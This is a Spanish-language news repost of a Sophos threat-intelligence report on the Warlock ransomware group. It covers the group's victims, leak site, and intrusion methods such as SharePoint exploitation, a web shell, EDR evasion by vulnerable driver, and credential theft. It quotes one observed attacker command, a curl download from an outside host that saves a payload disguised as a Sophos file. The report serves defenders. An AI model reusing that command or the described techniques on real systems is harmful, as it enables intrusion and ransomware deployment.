El grupo emergente demuestra competencia técnica utilizando un esquema de ransomware familiar y ciertos indicios de ingenio

 

Los investigadores de la Unidad de Contraamenazas (CTU) de Sophos están monitoreando a un grupo que se autodenomina Warlock Group. Este grupo, al que siguen bajo el nombre de GOLD SALEM, ha comprometido redes y desplegado su Ransomware Warlock desde marzo de 2025. Microsoft se refiere a este grupo como Storm-2603 y lo caracteriza “con confianza moderada, como un actor de amenazas con base en China”; sin embargo, los investigadores de CTU no cuentan con evidencia suficiente para corroborar dicha atribución.

 

Victimología y actividad en línea

Las 60 víctimas publicadas por el grupo hasta mediados de septiembre de 2025 lo colocan en un nivel intermedio en comparación con otras operaciones de Ransomware durante el mismo periodo. Las víctimas de GOLD SALEM han abarcado desde pequeñas entidades comerciales o gubernamentales hasta grandes corporaciones multinacionales distribuidas en América del Norte, Europa y América del Sur. Como ocurre con la mayoría de los grupos de Ransomware, GOLD SALEM ha evitado en gran medida comprometer a organizaciones ubicadas en China y Rusia, a pesar del amplio abanico de objetivos potenciales.

 

No obstante, el grupo publicó el nombre de una víctima, con sede en Rusia, en su sitio dedicado de filtraciones (Dedicated Leak Site, DLS) el 8 de septiembre. Se trata de una entidad comercial que ofrece servicios de ingeniería y equipos para la industria de generación eléctrica. A pesar de albergar una gran cantidad de distribuidores globales de Ransomware, la Federación Rusa es conocida por perseguir con fuerza a los grupos que atacan organizaciones en ese país y sus vecinos. El hecho de que GOLD SALEM haya listado a una víctima rusa sugiere que el grupo podría operar fuera de esta jurisdicción.

 

GOLD SALEM no tenía presencia pública hasta que, en junio de 2025, una persona que representaba al grupo publicó en el foro subterráneo RAMP solicitando exploits para aplicaciones empresariales comunes (por ejemplo, Veeam, ESXi, SharePoint) y herramientas para deshabilitar sistemas de detección y respuesta en endpoints (Endpoint Detection and Response, EDR), así como otros productos de seguridad. Una publicación posterior buscaba colaborar con initial access brokers (IABs) para obtener acceso inicial a potenciales víctimas. No está claro si el grupo buscaba acceso para llevar a cabo intrusiones por cuenta propia, reclutaba afiliados para una operación incipiente de Ransomware como servicio (Ransomware-as-a-Service, RaaS), o ambas cosas.

 

GOLD SALEM opera un DLS basado en Tor para publicar los nombres de víctimas y datos presuntamente robados de las mismas. Al 16 de septiembre, los datos de 19 de las 60 víctimas listadas (32%) se habían publicado en el DLS. Además, los actores de amenaza afirman haber vendido los datos de 27 víctimas (45%) a compradores privados, posiblemente como represalia por la falta de pago del rescate. Si bien se sabe que algunos grupos cibercriminales venden ocasionalmente datos robados a terceros, las cifras publicadas por GOLD SALEM probablemente están exageradas o son falsas. Tres nombres de víctimas que antes aparecían en el DLS fueron eliminados posteriormente.

 

GOLD SALEM ha publicado los nombres de víctimas comprometidas por distintas operaciones de Ransomware. Aunque es un hecho poco común, estas publicaciones pueden representar a initial access brokers (IABs) que venden acceso a múltiples actores de amenaza, afiliados que publican datos robados en varios sitios de filtraciones de Ransomware, o bien la incapacidad de una víctima para remediar eficazmente vectores comunes de acceso inicial, lo cual conduce a contraseñas repetidas.

 

Por ejemplo, un contratista comercial de construcción con sede en Estados Unidos, presuntamente vulnerado a inicios de junio de 2025, ya había sido víctima del Ransomware Hunters International de GOLD CRESCENT en octubre de 2024 y de Payout Kings en junio de 2025.

 

Los datos publicados por GOLD SALEM y los metadatos extraídos de su DLS sugieren que el grupo comenzó a atacar y extorsionar víctimas en marzo de 2025. El 10 de junio, una publicación en el foro RAMP anunció Warlock e incluyó un enlace a la primera versión de un DLS basado en Tor. La dirección de Tor fue desconectada el 11 de junio y no apareció un nuevo sitio hasta finales de julio. GOLD SALEM tiende a publicar en el DLS por lotes, lo que da como resultado que las víctimas aparezcan varios días o incluso semanas después del compromiso real. A cada víctima se le asigna una fecha de “cuenta regresiva” que indica el plazo para pagar el rescate. Esta fecha suele establecerse entre 12 y 14 días después de que la víctima aparece en el DLS.

 

Incidentes observados

A finales de julio, investigadores del CTU analizaron un incidente en el que GOLD SALEM utilizó la cadena de explotación ToolShell contra servidores SharePoint para obtener acceso inicial. Esta cadena de explotación se basa en el uso combinado de las vulnerabilidades CVE-2025-49704CVE-2025-49706CVE-2025-53770 y CVE-2025-53771. La explotación resultó en la colocación de una web shell ASPX que creó un objeto Process para cmd.exe dentro del contexto del proceso de trabajo de IIS (w3wp.exe). A partir de ahí, el atacante podía ejecutar comandos arbitrarios de forma remota y visualizar cualquier salida resultante. Los investigadores del CTU observaron el siguiente comando emitido a través de esta web shell:

curl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt

 

El ejecutable descargado era un servidor WebSockets basado en Golang que permitía mantener el acceso al servidor comprometido de forma independiente a la web shell. Los investigadores del CTU también observaron que GOLD SALEM evitó los sistemas EDR mediante la técnica conocida como Bring Your Own Vulnerable Driver (BYOVD), utilizando un controlador vulnerable del antivirus Baidu renombrado como googleApiUtil64.sys para eliminar el agente EDR. Una falla en este controlador (CVE-2024-51324) permite finalizar procesos arbitrarios.

 

El perfil del grupo elaborado por Microsoft señaló la ejecución de Mimikatz, «dirigido específicamente a la memoria del servicio Local Security Authority Subsystem Service (LSASS) para extraer contraseñas en texto claro». Microsoft también observó el uso de PsExec e Impacket para movimiento lateral, así como el uso de Group Policy Objects (GPO) para desplegar el payload de Warlock.

 

En agosto, los investigadores del CTU observaron a GOLD SALEM abusar de la herramienta legítima y de código abierto de análisis forense digital y respuesta ante incidentes (DFIR), Velociraptor, para establecer un túnel de red de Visual Studio Code dentro del entorno comprometido. Algunos de estos incidentes concluyeron con la ejecución del Ransomware Warlock.

 

Mitigaciones y detecciones

Las organizaciones deben implementar una supervisión regular de su superficie de ataque y mantener políticas de parches agresivas para servicios expuestos a internet. La detección y mitigación de explotaciones de día cero requiere monitoreo proactivo de endpoints y una respuesta a incidentes oportuna.

 

Las siguientes protecciones de Sophos detectan actividad relacionada con esta amenaza:

  • Troj/WebShel-F
  • Troj/Warlock-B
Google News Portal Educa
Síguenos en Google Noticias

Equipo Prensa
Portal Educa